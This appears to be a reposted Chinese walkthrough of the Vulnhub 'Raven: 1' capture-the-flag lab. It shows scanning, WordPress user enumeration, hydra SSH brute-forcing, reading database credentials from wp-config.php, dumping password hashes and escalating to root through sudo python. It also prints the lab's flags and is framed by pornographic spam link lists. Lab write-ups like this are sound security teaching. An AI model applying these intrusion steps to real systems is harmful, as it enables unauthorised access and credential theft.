日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

Vulnhub靶机渗透之 RAVEN: 1

發布時間:2025/3/15 编程问答 26 豆豆
生活随笔 收集整理的這篇文章主要介紹了 Vulnhub靶机渗透之 RAVEN: 1 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

目錄

Description

網卡信息

信息收集

主機發現

主機存活掃描

端口掃描

網站信息

網站首頁

nikto 報告

service 頁面

wordpress

滲透過程

SSH 爆破

Hydr 命令

進一步信息收集

查找包含Flag 的路徑

數據庫信息

查看數據庫配置文件

登入數據庫

查找用戶

steven 登入網站后臺

權限提升

切換steven 用戶

查看sudo 權限

python 命令提權


靶機下載地址:https://www.vulnhub.com/entry/raven-1,256/

Description

Raven is a Beginner/Intermediate boot2root machine. There are four flags to find and two intended ways of getting root. Built with VMware and tested on Virtual Box. Set up to use NAT networking.

網卡信息

網卡信息說明
網卡模式NAT
MAC 地址00:0C:29:D7:3D:BA

信息收集

主機發現

主機存活掃描

NAT模式下啟動kali,使用ssh遠程連接到物理機windows10(方便一點)
nmap -sP 192.168.30.0/24,得知靶機ip地址為192.168.30.145

?

端口掃描

nmap -A -p- -sC -T4 -sS -P0 192.168.30.145 -oN nmap.A
(nmap默認會掃描使用頻率最高的top1000端口,-p-就是掃描1-65535端口,nmap可以做漏洞掃描-sC,設置掃描速度-T4,nmap掃描速度有5檔T1~T5,T1最慢,T4最快,-sS做SYN半連接掃描,nmap對目標進行掃描的時候一共有兩步,第一步是確定主機是否在線,第二步再進行端口掃描,-P0是禁用nmap來判斷主機是否在線,直接進行強掃,直接就發包)

發現開放了80端口和22端口以及111,53161端口

網站信息

因為其開放80 端口,我們訪問其網頁
在我們訪問800端口的時候,網速很慢,此時就會產生疑問:我訪問本地的靶機問什么速度會這么慢?因為前端頁面需要去外網加載腳本。
那怎么看這個腳本呢?我們可以打開F12--網絡,會發現一些網站沒有返回值,所以會很慢

?這個問題解決不了,以為他會去外網去訪問一些資源,這些資源由于國內訪問不到,就會很慢

下面對網站進行指紋識別 ,用kali的whatweb

whatweb 是kali中網站指紋識別的工具,使用Ruby語言開發。whatweb可識別web技術,包括內容管理系統(CMS)、博客平臺、統計/分析包、JavaScript庫,Web服務器和嵌入式設備等

沒發現什么

網站首頁

http://raven.local/

?

nikto 報告

Nikto安裝及使用

Nikto 是一款開放源代碼的、功能強大的WEB掃描評估軟件,能對web服務器多種安全項目進行測試的掃描軟件,去尋找已知有名的漏洞,能在230多種服務器上掃描出 2600多種有潛在危險的文件、CGI及其他問題,它可以掃描指定主機的WEB類型、主機名、特定目錄、COOKIE、特定CGI漏洞、返回主機允許的 http模式等等。它也使用LibWhiske庫,但通常比Whisker更新的更為頻繁。Nikto是網管安全人員必備的WEB審計工具之一。

1. 快速入門

進行最基本的nikto掃描,你只需要指定目標的host(通過 -h 參數指定),也可以指定要掃描的端口號(通過 -p 來指定),默認是80

perl nikto.pl -h 192.168.0.1

2 多端口掃描

#掃描80,88,443三個端口

perl nikto.pl -h 192.168.0.1 -p 80,88,443

#掃描80~90共10個端口

perl nikto.pl -h 192.168.0.1 -p 80-90

┌──(root💀mi)-[~/tools/nikto/program] └─# ./nikto.pl -h http://raven.local - Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 192.168.30.145 + Target Hostname: raven.local + Target Port: 80 + Start Time: 2021-07-30 20:47:32 (GMT8) --------------------------------------------------------------------------- + Server: Apache/2.4.10 (Debian) + The anti-clickjacking X-Frame-Options header is not present. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. + No CGI Directories found (use '-C all' to force check all possible dirs) + Apache/2.4.10 appears to be outdated (current is at least Apache/2.4.43). Apache 2.2.34 is the EOL for the 2.x branch. + Server may leak inodes via ETags, header found with file /, inode: 41b3, size: 5734482bdcb00, mtime: gzip + Allowed HTTP Methods: GET, HEAD, POST, OPTIONS + OSVDB-3268: /css/: Directory indexing found. + OSVDB-3092: /css/: This might be interesting. + OSVDB-3268: /img/: Directory indexing found. + OSVDB-3092: /img/: This might be interesting. + OSVDB-3092: /manual/: Web server manual found. + OSVDB-3268: /manual/images/: Directory indexing found. + OSVDB-6694: /.DS_Store: Apache on Mac OSX will serve the .DS_Store file, which contains sensitive information. Configure Apache to ignore this file or upgrade to a newer version. + OSVDB-3233: /icons/README: Apache default file found. + /wordpress/wp-content/plugins/akismet/readme.txt: The WordPress Akismet plugin 'Tested up to' version usually matches the WordPress version + /wordpress/wp-links-opml.php: This WordPress script reveals the installed version. + /wordpress/: A Wordpress installation was found. + Cookie wordpress_test_cookie created without the httponly flag + /wordpress/wp-login.php: Wordpress login found + 7954 requests: 0 error(s) and 19 item(s) reported on remote host + End Time: 2021-06-14 11:28:39 (GMT8) (67 seconds) --------------------------------------------------------------------------- + 1 host(s) tested

看一下wordpress這個目錄和/wordpress/wp-login.php:

?

?

service 頁面

http://raven.local/service.html(我們是在/team.html,/service.html,/contact.php等一個一個試出來的)

右鍵查看源代碼,ctrl+F搜索flag關鍵字

<!-- flag1{b9bbcb33e11b80be759c4e844862482d} -->

wordpress

http://raven.local/wordpress/

用WordPress專門的掃描工具wpscan
命令:?wpscan --url http://192.168.30.145/wordpress/ -e vp,u
參數:-e就是枚舉??? vp,u就是vulnerable plug,user就是含有漏洞的組件還有用戶

?知道兩個用戶分別是steven和michael

由于知道用戶,又在nikto報告中知道登錄頁面在/wordpress/wp-login.php
我們差的就是密碼了,我們可以做爆破(先不考慮爆破)

看看能不能通過用戶登錄ssh:

?

說明Steven和Michael用戶都可以登錄ssh

亂寫一個用戶發現也可以登錄:

?

?

滲透過程

SSH 爆破

Hydr 命令

建立一個user.dic里面寫用戶

hydra -L user.dic -P ~/tools/wordList/top_password.txt ssh://10.10.10.42 -vV -f -e nsr -o hydra.ssh

-f是碰到遇到正確密碼就停止爆破,-vV顯示詳細信息
-e nsr 空口令,賬號密碼相同,密碼反向都用上

發現? login:michael??????????????? password:michael

ssh登錄:

進一步信息收集

查找包含Flag 的路徑

$ find / -name "*flag*" 2>/dev/null(找到了一些含有flag的文件)

看到一個/var/www/flag2.txt

cat /var/www/flag2.txt:

michael@Raven:/$ cat /var/www/flag2.txt
flag2{fc3fd58dcdad9ab23faca6e9a36e581c}

?找到flag2

?

下面查看一下靶機開放的哪些端口號

嘗試登陸數據庫:mysql -uroot -p,要求輸入密碼

?我們知道這個網站是帶數據庫的,數據庫密碼肯定在網站的配置文件中

到/var/www/html下看看

WordPress作為一款開源的CMS配置文件的路徑是固定的,是wp-config.php

數據庫信息

查看數據庫配置文件

cat /var/www/html/wordpress/wp-config.php

?

登入數據庫

找到root的用戶名密碼,登陸數據庫:

/** MySQL database password */
define('DB_PASSWORD', 'R@v3nSecurity');

查找用戶

select user_login,user_pass from wordpress.wp_users;

mysql> select * from wp_users; +----+------------+------------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+----------------+ | ID | user_login | user_pass | user_nicename | user_email | user_url | user_registered | user_activation_key | user_status | display_name | +----+------------+------------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+----------------+ | 1 | michael | $P$BjRvZQ.VQcGZlDeiKToCQd.cPw5XCe0 | michael | michael@raven.org | | 2018-08-12 22:49:12 | | 0 | michael | | 2 | steven | $P$Bk3VD9jsxx/loJoqNsURgHiaB23j7W/ | steven | steven@raven.org | | 2018-08-12 23:31:16 | | 0 | Steven Seagull | +----+------------+------------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+----------------+ 2 rows in set (0.00 sec)mysql> select user_login,user_pass from wordpress.wp_users; +------------+------------------------------------+ | user_login | user_pass | +------------+------------------------------------+ | michael | $P$BjRvZQ.VQcGZlDeiKToCQd.cPw5XCe0 | | steven | $P$Bk3VD9jsxx/loJoqNsURgHiaB23j7W/ | +------------+------------------------------------+ 2 rows in set (0.00 sec)

?

嘗試查詢md5 值。

user_login

user_passstevenpink84

?

?

?

?

steven 登入網站后臺

找到flag3,flag3{afc01ab56b50591e7dccf93122770cd2}。

?

?

權限提升

切換steven 用戶

su steven

查看sudo 權限

sudo -l

$ sudo -l Matching Defaults entries for steven on raven:env_reset, mail_badpass,secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin ? User steven may run the following commands on raven:(ALL) NOPASSWD: /usr/bin/python $

steven可以用root身份,不需要提供root密碼的情況下,去執行/usr/bin/python這個命令

sudo /usr/bin/python,這條命令敲下去之后,就可以以root身份去執行python命令,在執行期間,具有root用戶權限
我們知道權限是具有傳遞性的!如果我們以root身份調用python命令,那么python就可以以root身份去調用bash,bash就具備了root權限

python 命令提權

sudo python -c 'import pty;pty.spawn("/bin/bash")'。

$ sudo python -c 'import pty;pty.spawn("/bin/bash")' root@Raven:/home/michael# id uid=0(root) gid=0(root) groups=0(root) root@Raven:/home/michael#

?

發現flag4!拿到最后一個flag!

總結

以上是生活随笔為你收集整理的Vulnhub靶机渗透之 RAVEN: 1的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。

主站蜘蛛池模板: 91亚洲专区 | 日韩aaaaa| 奇米影视在线播放 | 1024国产视频 | 99爱99| 国产在线综合视频 | 日韩视频第一页 | 精品人妻无码一区二区色欲产成人 | 欧美激情成人在线 | 成人免费做受小说 | 另类二区| 97视频国产 | 深夜精品视频 | 国产精品国产一区 | 久久久久国产精品一区二区 | 久久久久久久久久网站 | 欧美在线a| www.色午夜| 爆操老女人 | 日韩福利视频网 | 久久国产精品久久久久久电车 | 国产精品一区二区在线观看 | 好吊妞一区二区三区 | 爽爽视频在线观看 | 国产操人 | 欧美黄在线 | 日韩a视频 | 做视频| 欧洲精品视频在线 | 亚州av影院| 丰满肥臀噗嗤啊x99av | 亚洲毛片大全 | 午夜黄色小视频 | 男女靠逼视频 | 日韩图片区 | 久久久久五月天 | 射进来av影视 | 四虎www| 女人高潮娇喘1分47秒 | 重口变态虐黄网站 | 亚洲最新在线 | 亚洲老女人视频 | 在线观看一级片 | 青青草视频免费看 | 欧美一级不卡 | 国产女人18毛片水真多 | 狠狠爱成人 | 超碰在线最新 | av老司机在线播放 | 国产精选网站 | 黄色女女| 日韩高清影视在线观看 | 在线观看一二三区 | 国产精品精 | 91麻豆精品国产91久久久久久久久 | 性欧美日韩 | 国产在线精 | 91成人毛片 | 2020亚洲男人天堂 | 草草福利影院 | 日韩制服诱惑 | 国产视频在线观看网站 | 99精品视频免费看 | 国产精品亚洲专区无码牛牛 | 中文字幕精品一区二区三区视频 | 欧美激情一区二区三区免费观看 | 在线人成| 狠狠干夜夜草 | 免费视频中文字幕 | 亚洲一二三精品 | 777久久久精品一区二区三区 | 天天操天天操天天操天天操 | 一区二区成人精品 | 精品中文字幕在线 | 体内射精一区二区 | 国语一区 | 色欲AV无码精品一区二区久久 | 久久久久久9 | 亚洲伦理一区 | 日本少妇吞精囗交 | 成人永久免费 | eeuss鲁丝片一区二区三区 | 在线观看视频色 | 国产精品国产a级 | 少妇人妻偷人精品无码视频 | 国产美女永久免费 | 欧美午夜精品久久久久久人妖 | 97人妻精品一区二区三区免费 | 成人看片网 | 男生女生操操操 | 亚洲一区二区欧美 | 日韩视频一区在线观看 | 91精选视频 | 亚洲一区精品在线观看 | 青春草在线视频观看 | 精品无码一区二区三区的天堂 | 狠狠插狠狠操 | 久久在线免费观看视频 | 日本在线视频免费 |